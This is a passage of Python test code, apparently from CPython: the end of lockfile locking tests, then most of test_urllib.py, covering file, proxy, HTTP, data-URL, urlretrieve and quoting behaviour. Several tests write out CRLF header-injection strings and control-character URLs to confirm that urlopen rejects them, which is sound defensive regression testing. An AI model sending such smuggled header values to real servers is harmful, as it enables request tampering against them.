threading.current_thread().get_name())
e2.set()
t.join()
def test_acquire_timeout_threaded(self):
self._test_acquire_timeout_helper(True)
def test_acquire_timeout_unthreaded(self):
self._test_acquire_timeout_helper(False)
def _test_release_basic_helper(self, tbool):
lock = lockfile.LockFile(self._testfile(), threaded=tbool)
lock.acquire()
assert lock.is_locked()
lock.release()
assert not lock.is_locked()
assert not lock.i_am_locking()
try:
lock.release()
except lockfile.NotLocked:
pass
except lockfile.NotMyLock:
raise AssertionError('unexpected exception: %s' %
lockfile.NotMyLock)
else:
raise AssertionError('erroneously unlocked file')
def test_release_basic_threaded(self):
self._test_release_basic_helper(True)
def test_release_basic_unthreaded(self):
self._test_release_basic_helper(False)
def _test_release_from_thread_helper(self, tbool):
e1, e2 = threading.Event(), threading.Event()
t = _in_thread(self._lock_wait_unlock, e1, e2)
e1.wait()
lock2 = lockfile.LockFile(self._testfile(), threaded=tbool)
assert lock2.is_locked()
assert not lock2.i_am_locking()
try:
lock2.release()
except lockfile.NotMyLock:
pass
else:
raise AssertionError('erroneously unlocked a file locked'
' by another thread.')
e2.set()
t.join()
def test_release_from_thread_threaded(self):
self._test_release_from_thread_helper(True)
def test_release_from_thread_unthreaded(self):
self._test_release_from_thread_helper(False)
def _test_is_locked_helper(self, tbool):
lock = lockfile.LockFile(self._testfile(), threaded=tbool)
lock.acquire()
assert lock.is_locked()
lock.release()
assert not lock.is_locked()
def test_is_locked_threaded(self):
self._test_is_locked_helper(True)
def test_is_locked_unthreaded(self):
self._test_is_locked_helper(False)
def test_i_am_locking(self):
lock1 = lockfile.LockFile(self._testfile(), threaded=False)
lock1.acquire()
try:
assert lock1.is_locked()
lock2 = lockfile.LockFile(self._testfile())
try:
assert lock1.i_am_locking()
assert not lock2.i_am_locking()
try:
lock2.acquire(timeout=2)
except lockfile.LockTimeout:
lock2.break_lock()
assert not lock2.is_locked()
assert not lock1.is_locked()
lock2.acquire()
else:
raise AssertionError('expected LockTimeout...')
assert not lock1.i_am_locking()
assert lock2.i_am_locking()
finally:
if lock2.i_am_locking():
lock2.release()
finally:
if lock1.i_am_locking():
lock1.release()
def _test_break_lock_helper(self, tbool):
lock = lockfile.LockFile(self._testfile(), threaded=tbool)
lock.acquire()
assert lock.is_locked()
lock2 = lockfile.LockFile(self._testfile(), threaded=tbool)
assert lock2.is_locked()
lock2.break_lock()
assert not lock2.is_locked()
try:
lock.release()
except lockfile.NotLocked:
pass
else:
raise AssertionError('break lock failed')
def test_break_lock_threaded(self):
self._test_break_lock_helper(True)
def test_break_lock_unthreaded(self):
self._test_break_lock_helper(False)
def _lock_wait_unlock(self, event1, event2):
"""Lock from another thread. Helper for tests."""
l = lockfile.LockFile(self._testfile())
l.acquire()
try:
event1.set() # we're in,
event2.wait() # wait for boss's permission to leave
finally:
l.release()
def test_enter(self):
lock = lockfile.LockFile(self._testfile())
lock.acquire()
try:
assert lock.is_locked(), "Not locked after acquire!"
finally:
lock.release()
assert not lock.is_locked(), "still locked after release!"
def _in_thread(func, *args, **kwargs):
"""Execute func(*args, **kwargs) after dt seconds. Helper for tests."""
def _f():
func(*args, **kwargs)
t = threading.Thread(target=_f, name='/*/*')
t.setDaemon(True)
t.start()
return t
|
test_urllib.py
|
"""Regression tests for what was in Python 2's "urllib" module"""
import urllib.parse
import urllib.request
import urllib.error
import http.client
import email.message
import io
import unittest
from unittest.mock import patch
from test import support
import os
try:
import ssl
except ImportError:
ssl = None
import sys
import tempfile
import warnings
from nturl2path import url2pathname, pathname2url
from base64 import b64encode
import collections
def hexescape(char):
"""Escape char as RFC 2396 specifies"""
hex_repr = hex(ord(char))[2:].upper()
if len(hex_repr) == 1:
hex_repr = "0%s" % hex_repr
return "%" + hex_repr
# Shortcut for testing FancyURLopener
_urlopener = None
def urlopen(url, data=None, proxies=None):
"""urlopen(url [, data]) -> open file-like object"""
global _urlopener
if proxies is not None:
opener = urllib.request.FancyURLopener(proxies=proxies)
elif not _urlopener:
opener = FancyURLopener()
_urlopener = opener
else:
opener = _urlopener
if data is None:
return opener.open(url)
else:
return opener.open(url, data)
def FancyURLopener():
with support.check_warnings(
('FancyURLopener style of invoking requests is deprecated.',
DeprecationWarning)):
return urllib.request.FancyURLopener()
def fakehttp(fakedata):
class FakeSocket(io.BytesIO):
io_refs = 1
def sendall(self, data):
FakeHTTPConnection.buf = data
def makefile(self, *args, **kwds):
self.io_refs += 1
return self
def read(self, amt=None):
if self.closed:
return b""
return io.BytesIO.read(self, amt)
def readline(self, length=None):
if self.closed:
return b""
return io.BytesIO.readline(self, length)
def close(self):
self.io_refs -= 1
if self.io_refs == 0:
io.BytesIO.close(self)
class FakeHTTPConnection(http.client.HTTPConnection):
# buffer to store data for verification in urlopen tests.
buf = None
def connect(self):
self.sock = FakeSocket(self.fakedata)
type(self).fakesock = self.sock
FakeHTTPConnection.fakedata = fakedata
return FakeHTTPConnection
class FakeHTTPMixin(object):
def fakehttp(self, fakedata):
self._connection_class = http.client.HTTPConnection
http.client.HTTPConnection = fakehttp(fakedata)
def unfakehttp(self):
http.client.HTTPConnection = self._connection_class
class FakeFTPMixin(object):
def fakeftp(self):
class FakeFtpWrapper(object):
def __init__(self, user, passwd, host, port, dirs, timeout=None,
persistent=True):
pass
def retrfile(self, file, type):
return io.BytesIO(), 0
def close(self):
pass
self._ftpwrapper_class = urllib.request.ftpwrapper
urllib.request.ftpwrapper = FakeFtpWrapper
def unfakeftp(self):
urllib.request.ftpwrapper = self._ftpwrapper_class
class urlopen_FileTests(unittest.TestCase):
"""Test urlopen() opening a temporary file.
Try to test as much functionality as possible so as to cut down on reliance
on connecting to the Net for testing.
"""
def setUp(self):
# Create a temp file to use for testing
self.text = bytes("test_urllib: %s\n" % self.__class__.__name__,
"ascii")
f = open(support.TESTFN, 'wb')
try:
f.write(self.text)
finally:
f.close()
self.pathname = support.TESTFN
self.returned_obj = urlopen("file:%s" % self.pathname)
def tearDown(self):
"""Shut down the open object"""
self.returned_obj.close()
os.remove(support.TESTFN)
def test_interface(self):
# Make sure object returned by urlopen() has the specified methods
for attr in ("read", "readline", "readlines", "fileno",
"close", "info", "geturl", "getcode", "__iter__"):
self.assertTrue(hasattr(self.returned_obj, attr),
"object returned by urlopen() lacks %s attribute" %
attr)
def test_read(self):
self.assertEqual(self.text, self.returned_obj.read())
def test_readline(self):
self.assertEqual(self.text, self.returned_obj.readline())
self.assertEqual(b'', self.returned_obj.readline(),
"calling readline() after exhausting the file did not"
" return an empty string")
def test_readlines(self):
lines_list = self.returned_obj.readlines()
self.assertEqual(len(lines_list), 1,
"readlines() returned the wrong number of lines")
self.assertEqual(lines_list[0], self.text,
"readlines() returned improper text")
def test_fileno(self):
file_num = self.returned_obj.fileno()
self.assertIsInstance(file_num, int, "fileno() did not return an int")
self.assertEqual(os.read(file_num, len(self.text)), self.text,
"Reading on the file descriptor returned by fileno() "
"did not return the expected text")
def test_close(self):
# Test close() by calling it here and then having it be called again
# by the tearDown() method for the test
self.returned_obj.close()
def test_info(self):
self.assertIsInstance(self.returned_obj.info(), email.message.Message)
def test_geturl(self):
self.assertEqual(self.returned_obj.geturl(), self.pathname)
def test_getcode(self):
self.assertIsNone(self.returned_obj.getcode())
def test_iter(self):
# Test iterator
# Don't need to count number of iterations since test would fail the
# instant it returned anything beyond the first line from the
# comparison.
# Use the iterator in the usual implicit way to test for ticket #4608.
for line in self.returned_obj:
self.assertEqual(line, self.text)
def test_relativelocalfile(self):
self.assertRaises(ValueError,urllib.request.urlopen,'./' + self.pathname)
class ProxyTests(unittest.TestCase):
def setUp(self):
# Records changes to env vars
self.env = support.EnvironmentVarGuard()
# Delete all proxy related env vars
for k in list(os.environ):
if 'proxy' in k.lower():
self.env.unset(k)
def tearDown(self):
# Restore all proxy related env vars
self.env.__exit__()
del self.env
def test_getproxies_environment_keep_no_proxies(self):
self.env.set('NO_PROXY', 'localhost')
proxies = urllib.request.getproxies_environment()
# getproxies_environment use lowered case truncated (no '_proxy') keys
self.assertEqual('localhost', proxies['no'])
# List of no_proxies with space.
self.env.set('NO_PROXY', 'localhost, anotherdomain.com, newdomain.com:1234')
self.assertTrue(urllib.request.proxy_bypass_environment('anotherdomain.com'))
self.assertTrue(urllib.request.proxy_bypass_environment('anotherdomain.com:8888'))
self.assertTrue(urllib.request.proxy_bypass_environment('newdomain.com:1234'))
def test_proxy_cgi_ignore(self):
try:
self.env.set('HTTP_PROXY', 'http://somewhere:3128')
proxies = urllib.request.getproxies_environment()
self.assertEqual('http://somewhere:3128', proxies['http'])
self.env.set('REQUEST_METHOD', 'GET')
proxies = urllib.request.getproxies_environment()
self.assertNotIn('http', proxies)
finally:
self.env.unset('REQUEST_METHOD')
self.env.unset('HTTP_PROXY')
def test_proxy_bypass_environment_host_match(self):
bypass = urllib.request.proxy_bypass_environment
self.env.set('NO_PROXY',
'localhost, anotherdomain.com, newdomain.com:1234, .d.o.t')
self.assertTrue(bypass('localhost'))
self.assertTrue(bypass('LocalHost')) # MixedCase
self.assertTrue(bypass('LOCALHOST')) # UPPERCASE
self.assertTrue(bypass('newdomain.com:1234'))
self.assertTrue(bypass('foo.d.o.t')) # issue 29142
self.assertTrue(bypass('anotherdomain.com:8888'))
self.assertTrue(bypass('www.newdomain.com:1234'))
self.assertFalse(bypass('prelocalhost'))
self.assertFalse(bypass('newdomain.com')) # no port
self.assertFalse(bypass('newdomain.com:1235')) # wrong port
class ProxyTests_withOrderedEnv(unittest.TestCase):
def setUp(self):
# We need to test conditions, where variable order _is_ significant
self._saved_env = os.environ
# Monkey patch os.environ, start with empty fake environment
os.environ = collections.OrderedDict()
def tearDown(self):
os.environ = self._saved_env
def test_getproxies_environment_prefer_lowercase(self):
# Test lowercase preference with removal
os.environ['no_proxy'] = ''
os.environ['No_Proxy'] = 'localhost'
self.assertFalse(urllib.request.proxy_bypass_environment('localhost'))
self.assertFalse(urllib.request.proxy_bypass_environment('arbitrary'))
os.environ['http_proxy'] = ''
os.environ['HTTP_PROXY'] = 'http://somewhere:3128'
proxies = urllib.request.getproxies_environment()
self.assertEqual({}, proxies)
# Test lowercase preference of proxy bypass and correct matching including ports
os.environ['no_proxy'] = 'localhost, noproxy.com, my.proxy:1234'
os.environ['No_Proxy'] = 'xyz.com'
self.assertTrue(urllib.request.proxy_bypass_environment('localhost'))
self.assertTrue(urllib.request.proxy_bypass_environment('noproxy.com:5678'))
self.assertTrue(urllib.request.proxy_bypass_environment('my.proxy:1234'))
self.assertFalse(urllib.request.proxy_bypass_environment('my.proxy'))
self.assertFalse(urllib.request.proxy_bypass_environment('arbitrary'))
# Test lowercase preference with replacement
os.environ['http_proxy'] = 'http://somewhere:3128'
os.environ['Http_Proxy'] = 'http://somewhereelse:3128'
proxies = urllib.request.getproxies_environment()
self.assertEqual('http://somewhere:3128', proxies['http'])
class urlopen_HttpTests(unittest.TestCase, FakeHTTPMixin, FakeFTPMixin):
"""Test urlopen() opening a fake http connection."""
def check_read(self, ver):
self.fakehttp(b"HTTP/" + ver + b" 200 OK\r\n\r\nHello!")
try:
fp = urlopen("http://python.org/")
self.assertEqual(fp.readline(), b"Hello!")
self.assertEqual(fp.readline(), b"")
self.assertEqual(fp.geturl(), 'http://python.org/')
self.assertEqual(fp.getcode(), 200)
finally:
self.unfakehttp()
def test_url_fragment(self):
# Issue #11703: geturl() omits fragments in the original URL.
url = 'http://docs.python.org/library/urllib.html#OK'
self.fakehttp(b"HTTP/1.1 200 OK\r\n\r\nHello!")
try:
fp = urllib.request.urlopen(url)
self.assertEqual(fp.geturl(), url)
finally:
self.unfakehttp()
def test_willclose(self):
self.fakehttp(b"HTTP/1.1 200 OK\r\n\r\nHello!")
try:
resp = urlopen("http://www.python.org")
self.assertTrue(resp.fp.will_close)
finally:
self.unfakehttp()
@unittest.skipUnless(ssl, "ssl module required")
def test_url_path_with_control_char_rejected(self):
for char_no in list(range(0, 0x21)) + [0x7f]:
char = chr(char_no)
schemeless_url = "//localhost:7777/test{}/".format(char)
self.fakehttp(b"HTTP/1.1 200 OK\r\n\r\nHello.")
try:
# We explicitly test urllib.request.urlopen() instead of the top
# level 'def urlopen()' function defined in this... (quite ugly)
# test suite. They use different url opening codepaths. Plain
# urlopen uses FancyURLOpener which goes via a codepath that
# calls urllib.parse.quote() on the URL which makes all of the
# above attempts at injection within the url _path_ safe.
escaped_char_repr = repr(char).replace('\\', r'\\')
InvalidURL = http.client.InvalidURL
with self.assertRaisesRegex(
InvalidURL,
"contain control.*{}".format(escaped_char_repr)):
urllib.request.urlopen("http:{}".format(schemeless_url))
with self.assertRaisesRegex(
InvalidURL,
"contain control.*{}".format(escaped_char_repr)):
urllib.request.urlopen("https:{}".format(schemeless_url))
# This code path quotes the URL so there is no injection.
resp = urlopen("http:{}".format(schemeless_url))
self.assertNotIn(char, resp.geturl())
finally:
self.unfakehttp()
@unittest.skipUnless(ssl, "ssl module required")
def test_url_path_with_newline_header_injection_rejected(self):
self.fakehttp(b"HTTP/1.1 200 OK\r\n\r\nHello.")
host = "localhost:7777?a=1 HTTP/1.1\r\nX-injected: header\r\nTEST: 123"
schemeless_url = "//" + host + ":8080/test/?test=a"
try:
# We explicitly test urllib.request.urlopen() instead of the top
# level 'def urlopen()' function defined in this... (quite ugly)
# test suite. They use different url opening codepaths. Plain
# urlopen uses FancyURLOpener which goes via a codepath that
# calls urllib.parse.quote() on the URL which makes all of the
# above attempts at injection within the url _path_ safe.
InvalidURL = http.client.InvalidURL
with self.assertRaisesRegex(
InvalidURL, r"contain control.*\\r.*(found at least . .)"):
urllib.request.urlopen("http:{}".format(schemeless_url))
with self.assertRaisesRegex(InvalidURL, r"contain control.*\\n"):
urllib.request.urlopen("https:{}".format(schemeless_url))
# This code path quotes the URL so there is no injection.
resp = urlopen("http:{}".format(schemeless_url))
self.assertNotIn(' ', resp.geturl())
self.assertNotIn('\r', resp.geturl())
self.assertNotIn('\n', resp.geturl())
finally:
self.unfakehttp()
@unittest.skipUnless(ssl, "ssl module required")
def test_url_host_with_control_char_rejected(self):
for char_no in list(range(0, 0x21)) + [0x7f]:
char = chr(char_no)
schemeless_url = "//localhost{}/test/".format(char)
self.fakehttp(b"HTTP/1.1 200 OK\r\n\r\nHello.")
try:
escaped_char_repr = repr(char).replace('\\', r'\\')
InvalidURL = http.client.InvalidURL
with self.assertRaisesRegex(
InvalidURL, r"contain control.*{}".format(escaped_char_repr)):
urlopen("http:{}".format(schemeless_url))
with self.assertRaisesRegex(InvalidURL, r"contain control.*{}".format(escaped_char_repr)):
urlopen("http:{}".format(schemeless_url))
finally:
self.unfakehttp()
@unittest.skipUnless(ssl, "ssl module required")
def test_url_host_with_newline_header_injection_rejected(self):
self.fakehttp(b"HTTP/1.1 200 OK\r\n\r\nHello.")
host = "localhost\r\nX-injected: header\r\n"
schemeless_url = "//" + host + ":8080/test/?test=a"
try:
InvalidURL = http.client.InvalidURL
with self.assertRaisesRegex(
InvalidURL, r"contain control.*\\r"):
urlopen("http:{}".format(schemeless_url))
with self.assertRaisesRegex(InvalidURL, r"contain control.*\\n"):
urlopen("http:{}".format(schemeless_url))
finally:
self.unfakehttp()
def test_read_0_9(self):
# "0.9" response accepted (but not "simple responses" without
# a status line)
self.check_read(b"0.9")
def test_read_1_0(self):
self.check_read(b"1.0")
def test_read_1_1(self):
self.check_read(b"1.1")
def test_read_bogus(self):
# urlopen() should raise OSError for many error codes.
self.fakehttp(b'''HTTP/1.1 401 Authentication Required
Date: Wed, 02 Jan 2008 03:03:54 GMT
Server: Apache/1.3.33 (Debian GNU/Linux) mod_ssl/2.8.22 OpenSSL/0.9.7e
Connection: close
Content-Type: text/html; charset=iso-8859-1
''')
try:
self.assertRaises(OSError, urlopen, "http://python.org/")
finally:
self.unfakehttp()
def test_invalid_redirect(self):
# urlopen() should raise OSError for many error codes.
self.fakehttp(b'''HTTP/1.1 302 Found
Date: Wed, 02 Jan 2008 03:03:54 GMT
Server: Apache/1.3.33 (Debian GNU/Linux) mod_ssl/2.8.22 OpenSSL/0.9.7e
Location: file://guidocomputer.athome.com:/python/license
Connection: close
Content-Type: text/html; charset=iso-8859-1
''')
try:
msg = "Redirection to url 'file:"
with self.assertRaisesRegex(urllib.error.HTTPError, msg):
urlopen("http://python.org/")
finally:
self.unfakehttp()
def test_redirect_limit_independent(self):
# Ticket #12923: make sure independent requests each use their
# own retry limit.
for i in range(FancyURLopener().maxtries):
self.fakehttp(b'''HTTP/1.1 302 Found
Location: file://guidocomputer.athome.com:/python/license
Connection: close
''')
try:
self.assertRaises(urllib.error.HTTPError, urlopen,
"http://something")
finally:
self.unfakehttp()
def test_empty_socket(self):
# urlopen() raises OSError if the underlying socket does not send any
# data. (#1680230)
self.fakehttp(b'')
try:
self.assertRaises(OSError, urlopen, "http://something")
finally:
self.unfakehttp()
def test_missing_localfile(self):
# Test for #10836
with self.assertRaises(urllib.error.URLError) as e:
urlopen('file://localhost/a/file/which/doesnot/exists.py')
self.assertTrue(e.exception.filename)
self.assertTrue(e.exception.reason)
def test_file_notexists(self):
fd, tmp_file = tempfile.mkstemp()
tmp_fileurl = 'file://localhost/' + tmp_file.replace(os.path.sep, '/')
try:
self.assertTrue(os.path.exists(tmp_file))
with urlopen(tmp_fileurl) as fobj:
self.assertTrue(fobj)
finally:
os.close(fd)
os.unlink(tmp_file)
self.assertFalse(os.path.exists(tmp_file))
with self.assertRaises(urllib.error.URLError):
urlopen(tmp_fileurl)
def test_ftp_nohost(self):
test_ftp_url = 'ftp:///path'
with self.assertRaises(urllib.error.URLError) as e:
urlopen(test_ftp_url)
self.assertFalse(e.exception.filename)
self.assertTrue(e.exception.reason)
def test_ftp_nonexisting(self):
with self.assertRaises(urllib.error.URLError) as e:
urlopen('ftp://localhost/a/file/which/doesnot/exists.py')
self.assertFalse(e.exception.filename)
self.assertTrue(e.exception.reason)
@patch.object(urllib.request, 'MAXFTPCACHE', 0)
def test_ftp_cache_pruning(self):
self.fakeftp()
try:
urllib.request.ftpcache['test'] = urllib.request.ftpwrapper('user', 'pass', 'localhost', 21, [])
urlopen('ftp://localhost')
finally:
self.unfakeftp()
def test_userpass_inurl(self):
self.fakehttp(b"HTTP/1.0 200 OK\r\n\r\nHello!")
try:
fp = urlopen("http://user:pass@python.org/")
self.assertEqual(fp.readline(), b"Hello!")
self.assertEqual(fp.readline(), b"")
self.assertEqual(fp.geturl(), 'http://user:pass@python.org/')
self.assertEqual(fp.getcode(), 200)
finally:
self.unfakehttp()
def test_userpass_inurl_w_spaces(self):
self.fakehttp(b"HTTP/1.0 200 OK\r\n\r\nHello!")
try:
userpass = "a b:c d"
url = "http://{}@python.org/".format(userpass)
fakehttp_wrapper = http.client.HTTPConnection
authorization = ("Authorization: Basic %s\r\n" %
b64encode(userpass.encode("ASCII")).decode("ASCII"))
fp = urlopen(url)
# The authorization header must be in place
self.assertIn(authorization, fakehttp_wrapper.buf.decode("UTF-8"))
self.assertEqual(fp.readline(), b"Hello!")
self.assertEqual(fp.readline(), b"")
# the spaces are quoted in URL so no match
self.assertNotEqual(fp.geturl(), url)
self.assertEqual(fp.getcode(), 200)
finally:
self.unfakehttp()
def test_URLopener_deprecation(self):
with support.check_warnings(('',DeprecationWarning)):
urllib.request.URLopener()
@unittest.skipUnless(ssl, "ssl module required")
def test_cafile_and_context(self):
context = ssl.create_default_context()
with self.assertRaises(ValueError):
urllib.request.urlopen(
"https://localhost", cafile="/nonexistent/path", context=context
)
class urlopen_DataTests(unittest.TestCase):
"""Test urlopen() opening a data URL."""
def setUp(self):
# text containing URL special- and unicode-characters
self.text = "test data URLs :;,%=& \u00f6 \u00c4 "
# 2x1 pixel RGB PNG image with one black and one white pixel
self.image = (
b'\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR\x00\x00\x00\x02\x00\x00\x00'
b'\x01\x08\x02\x00\x00\x00{@\xe8\xdd\x00\x00\x00\x01sRGB\x00\xae'
b'\xce\x1c\xe9\x00\x00\x00\x0fIDAT\x08\xd7c```\xf8\xff\xff?\x00'
b'\x06\x01\x02\xfe\no/\x1e\x00\x00\x00\x00IEND\xaeB`\x82')
self.text_url = (
"data:text/plain;charset=UTF-8,test%20data%20URLs%20%3A%3B%2C%25%3"
"D%26%20%C3%B6%20%C3%84%20")
self.text_url_base64 = (
"data:text/plain;charset=ISO-8859-1;base64,dGVzdCBkYXRhIFVSTHMgOjs"
"sJT0mIPYgxCA%3D")
# base64 encoded data URL that contains ignorable spaces,
# such as "\n", " ", "%0A", and "%20".
self.image_url = (
"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAIAAAABCAIAAAB7\n"
"QOjdAAAAAXNSR0IArs4c6QAAAA9JREFUCNdj%0AYGBg%2BP//PwAGAQL%2BCm8 "
"vHgAAAABJRU5ErkJggg%3D%3D%0A%20")
self.text_url_resp = urllib.request.urlopen(self.text_url)
self.text_url_base64_resp = urllib.request.urlopen(
self.text_url_base64)
self.image_url_resp = urllib.request.urlopen(self.image_url)
def test_interface(self):
# Make sure object returned by urlopen() has the specified methods
for attr in ("read", "readline", "readlines",
"close", "info", "geturl", "getcode", "__iter__"):
self.assertTrue(hasattr(self.text_url_resp, attr),
"object returned by urlopen() lacks %s attribute" %
attr)
def test_info(self):
self.assertIsInstance(self.text_url_resp.info(), email.message.Message)
self.assertEqual(self.text_url_base64_resp.info().get_params(),
[('text/plain', ''), ('charset', 'ISO-8859-1')])
self.assertEqual(self.image_url_resp.info()['content-length'],
str(len(self.image)))
self.assertEqual(urllib.request.urlopen("data:,").info().get_params(),
[('text/plain', ''), ('charset', 'US-ASCII')])
def test_geturl(self):
self.assertEqual(self.text_url_resp.geturl(), self.text_url)
self.assertEqual(self.text_url_base64_resp.geturl(),
self.text_url_base64)
self.assertEqual(self.image_url_resp.geturl(), self.image_url)
def test_read_text(self):
self.assertEqual(self.text_url_resp.read().decode(
dict(self.text_url_resp.info().get_params())['charset']), self.text)
def test_read_text_base64(self):
self.assertEqual(self.text_url_base64_resp.read().decode(
dict(self.text_url_base64_resp.info().get_params())['charset']),
self.text)
def test_read_image(self):
self.assertEqual(self.image_url_resp.read(), self.image)
def test_missing_comma(self):
self.assertRaises(ValueError,urllib.request.urlopen,'data:text/plain')
def test_invalid_base64_data(self):
# missing padding character
self.assertRaises(ValueError,urllib.request.urlopen,'data:;base64,Cg=')
class urlretrieve_FileTests(unittest.TestCase):
"""Test urllib.urlretrieve() on local files"""
def setUp(self):
# Create a list of temporary files. Each item in the list is a file
# name (absolute path or relative to the current working directory).
# All files in this list will be deleted in the tearDown method. Note,
# this only helps to makes sure temporary files get deleted, but it
# does nothing about trying to close files that may still be open. It
# is the responsibility of the developer to properly close files even
# when exceptional conditions occur.
self.tempFiles = []
# Create a temporary file.
self.registerFileForCleanUp(support.TESTFN)
self.text = b'testing urllib.urlretrieve'
try:
FILE = open(support.TESTFN, 'wb')
FILE.write(self.text)
FILE.close()
finally:
try: FILE.close()
except: pass
def tearDown(self):
# Delete the temporary files.
for each in self.tempFiles:
try: os.remove(each)
except: pass
def constructLocalFileUrl(self, filePath):
filePath = os.path.abspath(filePath)
try:
filePath.encode("utf-8")
except UnicodeEncodeError:
raise unittest.SkipTest("filePath is not encodable to utf8")
return "file://%s" % urllib.request.pathname2url(filePath)
def createNewTempFile(self, data=b""):
"""Creates a new temporary file containing the specified data,
registers the file for deletion during the test fixture tear down, and
returns the absolute path of the file."""
newFd, newFilePath = tempfile.mkstemp()
try:
self.registerFileForCleanUp(newFilePath)
newFile = os.fdopen(newFd, "wb")
newFile.write(data)
newFile.close()
finally:
try: newFile.close()
except: pass
return newFilePath
def registerFileForCleanUp(self, fileName):
self.tempFiles.append(fileName)
def test_basic(self):
# Make sure that a local file just gets its own location returned and
# a headers value is returned.
result = urllib.request.urlretrieve("file:%s" % support.TESTFN)
self.assertEqual(result[0], support.TESTFN)
self.assertIsInstance(result[1], email.message.Message,
"did not get an email.message.Message instance "
"as second returned value")
def test_copy(self):
# Test that setting the filename argument works.
second_temp = "%s.2" % support.TESTFN
self.registerFileForCleanUp(second_temp)
result = urllib.request.urlretrieve(self.constructLocalFileUrl(
support.TESTFN), second_temp)
self.assertEqual(second_temp, result[0])
self.assertTrue(os.path.exists(second_temp), "copy of the file was not "
"made")
FILE = open(second_temp, 'rb')
try:
text = FILE.read()
FILE.close()
finally:
try: FILE.close()
except: pass
self.assertEqual(self.text, text)
def test_reporthook(self):
# Make sure that the reporthook works.
def hooktester(block_count, block_read_size, file_size, count_holder=[0]):
self.assertIsInstance(block_count, int)
self.assertIsInstance(block_read_size, int)
self.assertIsInstance(file_size, int)
self.assertEqual(block_count, count_holder[0])
count_holder[0] = count_holder[0] + 1
second_temp = "%s.2" % support.TESTFN
self.registerFileForCleanUp(second_temp)
urllib.request.urlretrieve(
self.constructLocalFileUrl(support.TESTFN),
second_temp, hooktester)
def test_reporthook_0_bytes(self):
# Test on zero length file. Should call reporthook only 1 time.
report = []
def hooktester(block_count, block_read_size, file_size, _report=report):
_report.append((block_count, block_read_size, file_size))
srcFileName = self.createNewTempFile()
urllib.request.urlretrieve(self.constructLocalFileUrl(srcFileName),
support.TESTFN, hooktester)
self.assertEqual(len(report), 1)
self.assertEqual(report[0][2], 0)
def test_reporthook_5_bytes(self):
# Test on 5 byte file. Should call reporthook only 2 times (once when
# the "network connection" is established and once when the block is
# read).
report = []
def hooktester(block_count, block_read_size, file_size, _report=report):
_report.append((block_count, block_read_size, file_size))
srcFileName = self.createNewTempFile(b"x" * 5)
urllib.request.urlretrieve(self.constructLocalFileUrl(srcFileName),
support.TESTFN, hooktester)
self.assertEqual(len(report), 2)
self.assertEqual(report[0][2], 5)
self.assertEqual(report[1][2], 5)
def test_reporthook_8193_bytes(self):
# Test on 8193 byte file. Should call reporthook only 3 times (once
# when the "network connection" is established, once for the next 8192
# bytes, and once for the last byte).
report = []
def hooktester(block_count, block_read_size, file_size, _report=report):
_report.append((block_count, block_read_size, file_size))
srcFileName = self.createNewTempFile(b"x" * 8193)
urllib.request.urlretrieve(self.constructLocalFileUrl(srcFileName),
support.TESTFN, hooktester)
self.assertEqual(len(report), 3)
self.assertEqual(report[0][2], 8193)
self.assertEqual(report[0][1], 8192)
self.assertEqual(report[1][1], 8192)
self.assertEqual(report[2][1], 8192)
class urlretrieve_HttpTests(unittest.TestCase, FakeHTTPMixin):
"""Test urllib.urlretrieve() using fake http connections"""
def test_short_content_raises_ContentTooShortError(self):
self.fakehttp(b'''HTTP/1.1 200 OK
Date: Wed, 02 Jan 2008 03:03:54 GMT
Server: Apache/1.3.33 (Debian GNU/Linux) mod_ssl/2.8.22 OpenSSL/0.9.7e
Connection: close
Content-Length: 100
Content-Type: text/html; charset=iso-8859-1
FF
''')
def _reporthook(par1, par2, par3):
pass
with self.assertRaises(urllib.error.ContentTooShortError):
try:
urllib.request.urlretrieve('http://example.com/',
reporthook=_reporthook)
finally:
self.unfakehttp()
def test_short_content_raises_ContentTooShortError_without_reporthook(self):
self.fakehttp(b'''HTTP/1.1 200 OK
Date: Wed, 02 Jan 2008 03:03:54 GMT
Server: Apache/1.3.33 (Debian GNU/Linux) mod_ssl/2.8.22 OpenSSL/0.9.7e
Connection: close
Content-Length: 100
Content-Type: text/html; charset=iso-8859-1
FF
''')
with self.assertRaises(urllib.error.ContentTooShortError):
try:
urllib.request.urlretrieve('http://example.com/')
finally:
self.unfakehttp()
class QuotingTests(unittest.TestCase):
"""Tests for urllib.quote() and urllib.quote_plus()
According to RFC 2396 (Uniform Resource Identifiers), to escape a
character you write it as '%' + <2 character US-ASCII hex value>.
The Python code of ``'%' + hex(ord(<character>))[2:]`` escapes a
character properly. Case does not matter on the hex letters.
The various character sets specified are:
Reserved characters : ";/?:@&=+$,"
Have special meaning in URIs and must be escaped if not being used for
their special meaning
Data characters : letters, digits, and "-_.!~*'()"
Unreserved and do not need to be escaped; can be, though, if desired
Control characters : 0x00 - 0x1F, 0x7F
Have no use in URIs so must be escaped
space : 0x20
Must be escaped
Delimiters : '<>#%"'
Must be escaped
Unwise : "{}|\^[]`"
Must be escaped
"""
def test_never_quote(self):
# Make sure quote() does not quote letters, digits, and "_,.-"
do_not_quote = '' .join(["ABCDEFGHIJKLMNOPQRSTUVWXYZ",
"abcdefghijklmnopqrstuvwxyz",
"0123456789",
"_.-"])
result = urllib.parse.quote(do_not_quote)
self.assertEqual(do_not_quote, result,
"using quote(): %r != %r" % (do_not_quote, result))
result = urllib.parse.quote_plus(do_not_quote)
self.assertEqual(do_not_quote, result,
"using quote_plus(): %r != %r" % (do_not_quote, result))
def test_default_safe(self):
# Test '/' is default value for 'safe' parameter
self.assertEqual(urllib.parse.quote.__defaults__[0], '/')
def test_safe(self):
# Test setting 'safe' parameter does what it should do
quote_by_default = "<>"
result = urllib.parse.quote(quote_by_default, safe=quote_by_default)
self.assertEqual(quote_by_default, result,
"using quote(): %r != %r" % (quote_by_default, result))
result = urllib.parse.quote_plus(quote_by_default,
safe=quote_by_default)
self.assertEqual(quote_by_default, result,
"using quote_plus(): %r != %r" %
(quote_by_default, result))
# Safe expressed as bytes rather than str
result = urllib.parse.quote(quote_by_default, safe=b"<>")
self.assertEqual(quote_by_default, result,
"using quote(): %r != %r" % (quote_by_default, result))
# "Safe" non-ASCII characters should have no effect
# (Since URIs are not allowed to have non-ASCII characters)
result = urllib.parse.quote("a\xfcb", encoding="latin-1", safe="\xfc")
expect = urllib.parse.quote("a\xfcb", encoding="latin-1", safe="")
self.assertEqual(expect, result,
"using quote(): %r != %r" %
(expect, result))
# Same as above, but using a bytes rather than str
result = urllib.parse.quote("a\xfcb", encoding="latin-1", safe=b"\xfc")
expect = urllib.parse.quote("a\xfcb", encoding="latin-1", safe="")
